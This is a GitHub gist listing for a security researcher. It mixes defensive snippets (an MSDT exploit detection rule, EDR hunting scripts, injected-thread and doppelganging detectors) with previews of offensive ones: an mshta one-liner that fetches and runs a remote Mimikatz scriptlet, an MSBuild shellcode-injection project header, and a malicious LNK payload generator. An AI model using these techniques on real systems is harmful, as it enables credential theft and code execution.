Skip to content

Instantly share code, notes, and snippets.

View vector-sec's full-sized avatar

Eric vector-sec

51 followers · 0 following
View GitHub Profile
@vector-sec
vector-sec / detection.yml
Created May 31, 2022 16:51 — forked from kevthehermit/detection.yml
Office --> MSDT --> RCE
title: Sysmon Office MSDT
id: c95ed569-5da4-48b3-9698-5e429964556c
description: Detects MSDT Exploit Attempts
status: experimental
author: kevthehermit
date: 2022/05/30
references:
- https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
- https://gist.github.com/kevthehermit/5c8d52af388989cfa0ea38feace977f2
logsource:
@vector-sec
vector-sec / binary_analysis_hunting.py
Created July 2, 2021 18:27 — forked from rc-abodkins/binary_analysis_hunting.py
This script searches binaries within VMware Carbon Black EDR
import argparse
import os
import configparser
import csv
import sys
from os.path import exists
import requests
#Console Output coloring. Makes knowing if you have any errors/ warnings easier to identify
err_Col = '\033[91m'
@vector-sec
vector-sec / gist:0f0e23961ed5eddfce60a9559683ea54
Created July 12, 2018 20:36
### Keybase proof
I hereby claim:
* I am vector-sec on github.
* I am vector_sec (https://keybase.io/vector_sec) on keybase.
* I have a public key whose fingerprint is 45F7 FBFB 85BC 9C5D 26AF FA50 CDD7 1C71 4152 0611
To claim this, I am signing this object:
@vector-sec
vector-sec / mimikatz.sct
Created January 18, 2018 14:15
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
@vector-sec
vector-sec / Get-Doppelgangers.ps1
Created January 1, 2018 21:04 — forked from dezhub/Get-Doppelgangers.ps1
function Get-Doppelgangers
{
<#
.SYNOPSIS
Detects use of NTFS transactions for stealth/evasion, aka 'Process Doppelganging'
Author: Joe Desimone (@dez_)
License: BSD 3-Clause
@vector-sec
vector-sec / gist:9caa8e14b2adba7ab0c215a6bf856953
Created November 28, 2017 15:09
Carbon Black API - PowerShell Example - Find All FileMods By certutil.exe - Type 1 == PE Write.
$APIKey = 'KEY'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$url = "https://www.example.com/api/v1/process?q=process_name:certutil.exe"
$hdrs = @{}
$hdrs.Add("X-Auth-Token",$APIKey)
$response = Invoke-RestMethod -Uri $url -Headers $hdrs
for($i =0; $i -lt $response.total_results; $i++)
{
@vector-sec
vector-sec / msbuildQueueAPC.csproj
Created August 30, 2017 13:11
MSBuild => CSC.exe Shellcode Inject using QueueUserAPC
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<-- x86 -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj -->
<!- x64 -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
@vector-sec
vector-sec / Get-Token.ps1
Created August 10, 2017 17:51
PowerShell script to enumerate all Process and Thread tokens.
function Get-Token
{
foreach($proc in (Get-Process))
{
if($proc.Id -ne 0 -and $proc.Id -ne 4)
{
try
{
$hProcess = OpenProcess -ProcessId $proc.Id -DesiredAccess PROCESS_QUERY_LIMITED_INFORMATION
}
@vector-sec
vector-sec / Create-LNK.ps1
Created June 30, 2017 15:59 — forked from enigma0x3/Create-LNK.ps1
function Create-LNKPayload{
<#
.SYNOPSIS
Generates a malicous LNK file
.PARAMETER LNKName
Name of the LNK file you want to create.
@vector-sec
vector-sec / Get-InjectedThread.ps1
Created May 10, 2017 15:38 — forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION